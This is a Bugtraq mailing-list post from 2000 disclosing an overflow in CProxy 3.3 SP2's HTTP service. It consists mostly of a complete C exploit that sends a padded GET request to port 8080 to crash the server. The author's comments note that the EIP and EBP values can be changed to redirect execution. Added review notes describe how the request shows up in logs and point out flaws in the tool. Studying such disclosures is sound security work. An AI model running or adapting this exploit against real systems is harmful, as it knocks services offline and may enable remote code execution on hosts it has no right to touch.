Bugtraq mailing list archives
CProxy v3.3 SP 2 DoS
From: tdp () PSYNET NET (|[TDP]|)
Date: Tue, 16 May 2000 17:10:25 +0200
Last day I found a vulnerability in CProxy while I was testing it to install in a host server in one office... Here is the test that demonstrate the existence of the bug

/*
 * Remote Denial of Service for CProxy v3.3 - Service Pack 2
 *
 * (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp () psynet net>
 *
 *
 * This program xploits an overflow vulnerability in CProxy 3.3 SP2
 * HTTP Service (8080), causing server shutdown
 *
 * Greetings to all the other members and all my friends :)
 */

/*
 * NOTE(review): what the code below does, as far as the listing shows.
 * It sends a single request, "GET http://<host> HTTP/1.0", to TCP port 8080.
 * <host> is BUFFERSIZE-8 bytes of 0x90 followed by two caller-adjustable
 * values. The author reports that this shuts the proxy service down.
 *
 * Defender view: the request stands out on the wire and in proxy logs as a
 * request line whose URL host part is roughly BUFFERSIZE bytes long and made
 * almost entirely of non-printable 0x90 bytes. The author's comment next to
 * the EIP/EBP defines claims the saved frame pointer and return address end
 * up holding sender-chosen values, so the flaw should be triaged as memory
 * corruption rather than as an availability problem only. The post names no
 * fixed version -- TODO confirm vendor status before relying on an upgrade.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/* NOTE(review): memset(), strlen() and bzero() are used below, but neither
 * <string.h> nor <strings.h> is included directly in this listing. */

/* Size of the local padding buffer that becomes the URL host part. */
#define BUFFERSIZE 247
/* Fill byte used for the padding. */
#define NOP 0x90

// If you change this values you can change EIP and EBP values
// to redirect to a code that you want >;)
/* Defaults for the last two words of the padding (0x61 is ASCII 'a'). */
#define EIP 0x61616161
#define EBP 0x61616161

/* Print the command-line synopsis to stderr and exit with status 1. */
void usage(char *progname) {
    fprintf(stderr,"Usage: %s <hostname> [eip] [ebp]\n",progname);
    exit(1);
}

/*
 * Build the oversized request and send it once to <hostname>:8080.
 *
 * argv[1] is the target host name or dotted address. argv[2] and argv[3] are
 * optional and are ADDED to the EIP/EBP defaults (they are offsets, not
 * absolute values).
 *
 * Returns 0 after the request was written and the socket closed, -1 when
 * socket(), address resolution, connect(), write() or close() is reported as
 * failed.
 */
int main(int argc, char **argv) {
    char *ptr,buffer[BUFFERSIZE], remotedos[1024];
    unsigned long *long_ptr,eip=EIP, ebp=EBP;
    int aux,sock; /* aux is declared but never used */
    struct sockaddr_in sin;
    unsigned long ip;
    struct hostent *he;

    fprintf(stderr,"\n-= Remote DoS for CProxy v3.3 ServicePack 2 - (C) |[TDP]| - H13 Team =-\n");
    if (argc<2) usage(argv[0]);
    if (argc>=3) eip+=atol(argv[2]);
    if (argc>=4) ebp+=atol(argv[3]);

    /* Zero the buffer, then fill all but its last 8 bytes with the pad byte. */
    ptr=buffer;
    memset(ptr,0,sizeof(buffer));
    memset(ptr,NOP,sizeof(buffer)-8);
    ptr+=sizeof(buffer)-8;

    /*
     * NOTE(review): this tool is itself memory-unsafe. The two stores below
     * fit the remaining 8 bytes only if unsigned long is 4 bytes wide; with
     * an 8-byte unsigned long they run past the end of buffer. The pointer
     * is also not guaranteed to be suitably aligned for unsigned long. Even
     * in the 4-byte case, the terminator written through ptr lands at
     * buffer[BUFFERSIZE], one byte past the array.
     */
    long_ptr=(unsigned long*)ptr;
    *(long_ptr++) = ebp;
    *(long_ptr++) = eip;
    ptr=(char *)long_ptr;
    *ptr='\0';

    /* Format the request line; snprintf bounds the write to remotedos. */
    bzero(remotedos, sizeof(remotedos));
    snprintf(remotedos, sizeof(remotedos), "GET http://%s HTTP/1.0\r\n\r\n\r\n",buffer);

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        perror("socket()");
        return -1;
    }

    /* Try a name lookup first, then fall back to parsing a dotted address. */
    if ((he = gethostbyname(argv[1])) != NULL) {
        ip = *(unsigned long *)he->h_addr;
    } else {
        /* NOTE(review): inet_addr() signals failure with INADDR_NONE, not 0,
         * so this comparison against NULL does not detect a bad address. */
        if ((ip = inet_addr(argv[1])) == NULL) {
            perror("inet_addr()");
            return -1;
        }
    }

    /* The destination port is fixed at 8080. */
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = ip;
    sin.sin_port = htons(8080);

    fprintf(stderr,"\nEngaged...\n");
    if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        perror("connect()");
        return -1;
    }

    /* One write of the whole request; a short write is reported as an error. */
    if (write(sock, remotedos, strlen(remotedos)) < strlen(remotedos)) {
        perror("write()");
        return -1;
    }

    fprintf(stderr,"Bye Bye baby!...\n\n");
    if (close(sock) < 0) {
        perror("close()");
        return -1;
    }
    return(0);
}